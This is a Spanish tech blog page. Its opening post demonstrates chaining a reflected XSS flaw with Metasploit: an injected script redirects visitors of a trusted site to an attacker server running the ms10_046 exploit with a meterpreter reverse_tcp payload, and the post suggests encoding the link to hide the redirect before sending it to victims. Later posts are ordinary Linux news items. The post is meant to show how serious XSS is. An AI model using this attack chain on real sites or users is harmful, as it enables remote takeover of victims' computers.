Combinando ataques: XSS + Metasploit

En esta oportunidad voy a demostrar y comprobar que tan grave puede ser una vulnerabilidad de tipo Cross Site Scripting No Persistente (XSS).

Para entrar en tema vamos a hacer un breve repaso por las cuestiones técnicas de dicho fallo de diseño:

XSS es una vulnerabilidad Web que surge del incorrecto saneamiento de parámetros de entrada, mediante el cual puede inyectarse código de script en el cliente.

Ejemplo de código php vulnerable:

<? echo $_GET['id']; ?>
De esta forma podríamos aprovecharnos haciendo una molificación en los parámetros de la siguiente forma:

www.sitio.com/script_vulnerable.php?id=1<script>alert(“Pwned!”)</script>



En código PHP, podríamos evitar estos dolores de cabeza haciendo un correcto saneamiento con las funciones “urlencode”, “htmlentities” y “addslashes”.

El objetivo de este articulo NO es hacer un tutorial explicativo sobre el fallo, sino ampliar las fronteras del alcance e impacto para que se tenga en consideración la gravedad de los hechos.

Si bien es cierto que seria demasiado conseguir las cookies de la víctima, porque no explorar mas allá de lo ya bien conocido y combinamos técnicas para lograr acceso a su equipo en vez de quedarnos con su información ?!

Podríamos utilizar la URL como vector de ataque y contaríamos con la ventaja de que el dominio ya cuenta con su reputación propia, por lo cual, nadie desconfiaría a la hora de darle “Click”. Dentro del URIPATH podríamos agregar un <script> para hacer una redireccion a nuestro sitio malicioso.

http://www.DominioDeConfianza.com/noticia.php?id=1<script>document.location=”http://www.SitioMalicioso.com”</script>
Comenzamos cargando en metasploit un  ClientSide, en este caso:

use exploit/windows/browser/ms10_046_shortcut_icon_dllloader set payload windows/meterpreter/reverse_tcp
Proporcionamos los datos de conflagración necesarios.



Una vez preparado el servidor atacante, se prepara el URI para enviar a la víctima. Se puede hacer una codificación del URIPATH para evitar una lectura sencilla que advierta la redireccion, para esto se puede utilizar un URLENCODER.

http://www.DominioDeConfianza.com/ScriptVulnerable.php?id=1<script>document.location=”http://www.ServidorAtacante.com”</script>/<textarea>
El link puede ser enviado por cualquier medio: mail, msn, redes sociales, etc. En este caso agregamos un “Alert” para mostrar la redirección en proceso:



Entre tanto, del lado del servidor pasa lo siguiente:



Y como vemos en el screenshot se ha creado una nueva sesión de meterpreter, lo cual significa que conseguimos Acceso y control total del equipo víctima utilizando como vector de ataque un simple XSS No persistente.

Del lado de la víctima en este caso estaría viendo lo siguiente:



Para finalizar vamos a crear un directorio en el escritorio de la víctima desde la consola de meterpreter con un clásico PWNED:





Y de esta forma queda demostrada la GRAVEDAD de un simple XSS no persistente. Quizas no es tan grave para la integridad del sitio vulnerable, pero si lo es para los clientes/usuarios que visitan la pagina en cuestión. La credibilidad de una empresa puede decaer considerablemente si se llegase a utilizar su dominio como medio de infección.

Source ~ Mkit

Archlinux decide no incluir el instalador AIF

Se ha publicado una nueva imagen de instalación de Arch Linux 2012.07.15 donde se muestra la nueva política de Arch en cuanto a las instalaciones del sistema.

Los desarrolladores de esta distro han decidido no incluir el instalador AIF (Arch Instalation Framework), lo cual hará que usuarios que no estén familiarizados con esta distribución, o vengan de otras distribuciones mas destinadas al usuario doméstico y de sistemas como Windows o Mac Os, se les haga muy duro instalarla, ya que a partir de ahora la instalación será por completo a través de la terminal.

De todos modos, en la wiki han publicado una pequeña guía de instalación de la nueva imagen del sistema, aunque por ahora esta en inglés, seguro que pronto se realizará la traducción a varios idiomas. Quizás próximamente publique un pequeño tutorial de como realizar la instalación del sistema con la nueva imagen.

En mi opinión personal, ME AGRADA DEMASIADO ESTA NOTICIA.

LinuxMint 13 "Maya" Disponible con XFCE

 

Como siempre, con un poco de retraso sobre la versión principal de la distribución, Linux Mint 13 ya tiene disponible su versión con Xfce. Se trata de la adaptación de la última versión de Mint a este escritorio, que se ha convertido el la opción favorita de muchos que buscan un escritorio sencillo, sin grandes pretensiones gráficas, huyendo de las nueva interfaces más pensadas para su uso táctil que con teclado y ratón 

Esta versión incorpora Xfce 4.10, el menú de Mint y otros applets de MATE. Como requisitos para su instalación necesitamos un mínimo de 384 MB de RAM y 5 GB de espacio en disco y tenemos versiones disponibles tanto en 32 como en 64 bits. No se si con estas necesidades de hardware ya ha perdido el calificativo de escritorio ligero o no, pero todavía sigue así nombrado en la descripción que hace Mint de la distribución.

El mintMenu ha sido adaptado para dar soporte a Thunar, el nuevo gestor de archivos de Xfce, y también para el administrador de configuración de Xfce. Como ya os adelantamos incorpora MDM, el completo gestor de acceso derivado de GDM 2.0 heredada de la versión mayor Linux Mint 13, así como el cambio del motor de búsquedas a Yahoo, para muchos países, entre ellos España.

Xfce se ha convertido en la alternativa de escritorio preferida por Mint por encima de KDE, para sus lanzamientos secundarios. Algo por otra parte lógico si tenemos en cuenta que Mint es una distribución derivada de Ubuntu, que no se ha caracterizado precisamente por apostar por KDE. Los rumores apuntaban a que tal vez Mint apostara por hacer de KDE una versión rolling, aunque parece que no será en la siguiente versión que ya están preparando. 

Más información | Blog Linux Mint

Linux 3.5 Disponible

Linux 3.5 incluye soporte mejorado para gráficos híbridos, nuevos mecanismos de filtrado para seccom (Secure Computing Mode, del que, por cierto, se va a beneficiar Google Chrome exclusivamente en Linux, equiparando su seguridad a la que tiene en Windows), o soporte para “FireWire Target Disk Mode”, una característica que le resultará familiar a los usuarios de Mac OS X.

Son muchas las novedades de Linux 3.5, y el mejor lugar para conocerlas es The H Open, donde como siempre, han publicado un detallado artículo repasando todo lo que trae esta nueva versión del kernel. Si queréis más caña, por supuesto, el también habitual artículo de Kernel Newbies ofrece toda la información al detalle, con enlaces a cada commit.

Por último, en Kernel.org ya está disponible la descarga del código fuente de Linux 3.5, para quien guste

PDFCube - Lector de PDF con efectos 3D

PDF Cube es un programa de linux, para ver y realizar presentaciones de archivos PDF con efectos 3D, que incluye rotación del cubo entre transiciones de página, y animaciones predefinidas de zoom en 5 zonas diferentes de la pantalla.

Al lanzar PDF Cube, automáticamente se nos abre nuestro gestor de archivos (nautilus, dolphin,…), con el que podremos seleccionar el PDF que nos apetece visionar. Para facilitar esa lectura disponemos además de varios atajos de comandos:

Tecla “f“: Sirve para desactivar el modo pantalla completa
Teclas “h”, “j”, “k”, “l” y “z“: Para realizar zoom en diferentes areas
Tecla “espacio” para avanzar normalmente entre páginas
Teclas “a” y “c” para rotar el cubo.

También permite cambiar el color de fondo del programa y del cubo en si (pdfcube --h)

Instalación

Se encuentra en los repositorios oficiales de distintas distros (Debian/Ubuntu) y en Archlinux lo encontraremos en nuestro querido AUR.

Como veis es un programa bastante interesante, con un toque “cool”, que a algunos les recordará a compiz, ideal para hacer presentaciones y que sorprendentemente tampoco consume demasiada RAM.

Una Mirada a Firefox OS

Una de las noticias que más revuelo generó en las últimas semanas fue el lanzamiento de Firefox OS, conocido también como Boot to Gecko, el sistema operativo móvil de Mozilla.
Ahora se pudieron ver algunas capturas que nos proveen de un pantallazo de las características visuales y estéticas del Firefox OS, el cual apunta a ser un sistema operativo móvil totalmente abierto que, además, funcione con apps basadas en HTML5. Vale aclarar que esta tecnología les permite a los desarrolladores programar sin preocuparse por los equipos en los cuales deberán correr esas aplicaciones, ya que sólo hace falta que el navegador tenga HTML5 incorporado.
Ls imágenes corresponden a TechWeek Europe, y se pueden apreciar en la estética del nuevo sistema ciertas influencias tanto de iOS como de Android. Asimismo, el resultado es bastante original y por sobre todas las cosas sobrio, con una estética simple que seguramente agradará a los usuarios.

El bloqueo de pantalla, notificaciones y pantalla de bienvenida

En la pantalla bloqueada vemos un botón central deslizante. Según vemos, si lo deslizamos hacia un lado desbloquearemos la pantalla, mientras que si hacemos lo propio pero hacia la izquierda, accederemos a la cámara del equipo. Asimismo, desbloqueemos o no la pantalla, aún podemos visualizar algunas de las notificaciones, ya sea de mensajes o llamadas, o bien de los distintos servicios de internet móvil.

Una vez que desbloqueamos el teléfono, podremos observar los pequeños íconos en cuatro columnas. Estos, por suerte, son circulares: no sea cosa que enojemos a Apple.

Llamadas

En estas imágenes podemos apreciar el comportamiento del sistema ante las llamadas. Cuando se recibe una llamada, se detecta el número de contacto y se muestra una imagen del mismo, esto, claro, siempre que tengamos a la persona agendada. Como observamos, se reitera el botón central aparentemente deslizante. De la misma forma, cuando intentamos efectuar una llamada, Firefox OS nos provee de una foto de contacto y, bien diferenciados, los botones de llamado. El dial, en tanto, es bastante simple y con números grandes y fácilmente visibles.

Mención aparte merece la opción de “llamada de emergencia“, que establece uno de nuestros contactos en particular y lo prioriza ante otros números, en una pantalla bien visible y con un botón directo de llamado.

Contactos

La lista general de contactos se puede diferenciar por círculos: “familia“, “negocios“, “amigos de“, según vemos en la captura. Asimismo , la lista está coronada con un borde superior de color naranja Firefox.

Este borde se reitera cuando accedemos a cada uno de los contactos de manera individual, a los cuales se le pueden cargar múltiples números y cuentas de mail. También parece haber un apartado de “favoritos”, seguramente indicado por la estrella dorada.

Lo que si resulta bastante llamativo es que el Firefox OS modifique por si sólo los datos de nuestro estimado Mark Alfenito, el cual cambia inesperadamente de apellido por “Alfentio” al desplegar la ficha personal. Raro, no?

Fotos

La herramienta para sacar fotos también resulta simple, y ningún elemento en la pantalla hace ruido o confunde a la hora de tomar una imagen. El botón de captura está en la esquina inferior izquierda, y parece, por los botones de centrales, que se puede compartir ni bien se toma la foto.
Las imágenes luego son ordenadas en una cuadrícula de tres columnas. Semejante a Android ICS.

Mensajes y correos

El teclado virtual se despliega con teclas rectangulares, con bordes redondeados y bien separadas una de otra, y ocupa en total casi la mitad de la pantalla. El teclado, a su vez, es casi igual tanto para la app de correos como para la de sms.



Si bien el look tiene alguna reminiscencia a iOS, la diferencia está, por ejemplo, en las pequeñas fotos que muestra la carpeta de mensajes recibidos, tanto mails como sms. En la de correos además se despliegan algunas opciones más, donde la estética repite nuevamente el color naranja.
Ya tenemos una idea de cómo será manejarnos con Firefox OS. Ahora a esperar, ya que el primer equipo con este sistema se estrena hacia finales de este año o principios de 2013, y será lanzado en Brasil.

Vía: PhoneArena

Wep Apps | Disponibles en Ubuntu

Mark Shuttleworth ha participado en una de las conferencias de la OSCON 2012, dejando más de una noticia interesante tras su charla. Como la integración de aplicaciones web en Ubuntu, que no es algo novedoso, pero que gracias a las particulares características de Unity mejorará mucho.

Disponer de web apps es muy fácil actualmente a través de navegadores como Chrome/Chromium o rekonq. Basta con utilizar la opción pertinente para guardar un lanzador / enlace de Gmail, Grooveshark o cualquier otro servicio / aplicación en el escritorio. El problema es que todo queda “en crudo”, sin integración con paneles o menús. Y eso es precisamente lo que va a solventar Ubuntu.

Según publica Jono Bacon en su blog (ahí están todos los detalles), las aplicaciones web llegarán a Ubuntu 12.10 con todas las de la ley: se integrarán con el panel, con el dash, lenses, quicklists, HUD y más, mucho más. De hecho, son esos “extras” lo más interesante de todo.

Valve anuncia oficialmente "Steam Para Linux"

Las noticias contradictorias acerca de la llegada de Steam para Linux no han parado de sucederse en los dos últimos años. De la negativa absoluta hemos pasado a las confirmaciones tácitas, y así ha llegado el primer anuncio oficial.

De hecho, Valve ha puesto en línea un blog dedicado en exclusiva a documentar los avances de la compañía en Linux, plataforma la nuestra con la que llevan trabajando alrededor de un año en diversos apartados.

El primer artículo publicado en el blog explica cómo se gestó todo: de utilizar Ubuntu en los servidores de algunos juegos pasaron a portar el cliente de Steam y Left 4 Dead 2 a Ubuntu con éxito. Ahora el trabajo se centra en tres pasos concretos:

• Conseguir que el cliente de Steam para Linux goce de todas las funciones de su versión Windows.
• Optimizar Left 4 Dead 2 para funcionar a una velocidad aceptable con OpenGL.
• Portar títulos adicionales de Valve.

Por ahora todos los esfuerzos de la compañía se centran en Ubuntu, y la elección de esta distribución es tan obvia que no hace falta ni comentarla (o tratar de justificarla, como hacen en el artículo original). Eso sí, que nadie se equivoque: Steam llegará a Ubuntu, pero también al resto de distribuciones GNU/Linux (o eso dicen).

Tampoco os ilusionéis demasiado, porque no se dan fechas o plazos de ningún tipo y la cosa tiene pinta de tardar lo suyo en echar a andar. Pero qué duda cabe de que estamos ante un avance importante en lo que a videojuegos en Linux se refiere.

Fuente ~ Muylinux

Disponible openSUSE 12.2 RC 1

Tal y como publican en MuyComputer, tras un retraso respecto a la planificación original, openSUSE 12.2 cumple con un paso más en su desarrollo y se acaba de publicar su primera versión candidata, apta solo para pruebas.

openSUSE 12.2 RC 1 presenta numerosas novedades, a destacar el kernel Linux 3.4, el cargador de arranque GRUB 2.0 o los entornos de escritorio GNOME 3.4 y KDE 4.8.4, entre otros. Como nota, se ha descartado la inclusión de KDE 4.9, con lanzamiento previsto para el 1 de agosto, en pos de la estabilidad (contrasta esta decisión con la tomada por otras distribuciones GNU/Linux basadas en KDE, como Chakra).

Siguiendo con los componentes del sistema, hay nuevas versiones del gestor de paquetes Zypper (que va camino de convertirse en el mejor de Linux), el compilador GCC (4.7) o el servidor gráfico Xorg (1.12.3). También las últimas versiones de las aplicaciones más conocidas están presentes, es el caso de Firefox, GIMP o LibreOffice. Más detalles.

Según el nuevo calendario marcado, la siguiente y última RC de openSUSE 12.2 llegará el 2 de agosto, la versión final a mediados de septiembre, sin fecha concreta (si no hay más retrasos en su desarrollo). Porque ahora lo más importante para el proyecto es pulir todos los errores que se encuentren, para así lanzar el mejor producto posible.

Si te apetece ayudar en la tarea de reportar fallos o simplemente tienes curiosidad por probar las novedades antes que nadie, la descarga de openSUSE 12.2 RC 1 te está esperando.

Fuente ~ Muylinux

Adios Vacaciones, Hola Kodelabs.

 

Pues bueno, desde el mes de Mayo decidí tomarme unas vacaciones de el mundo informático pero ya estoy de vuelta :) a partir de este día vuelven las entradas diarias al blog.. 

Un saludito a todos mis noobsters que extrañé. 

@Sniferl4bs | @LordRna | @Ztux 

Porsupuesto un saludo a todos mis lectores Kodeinfect.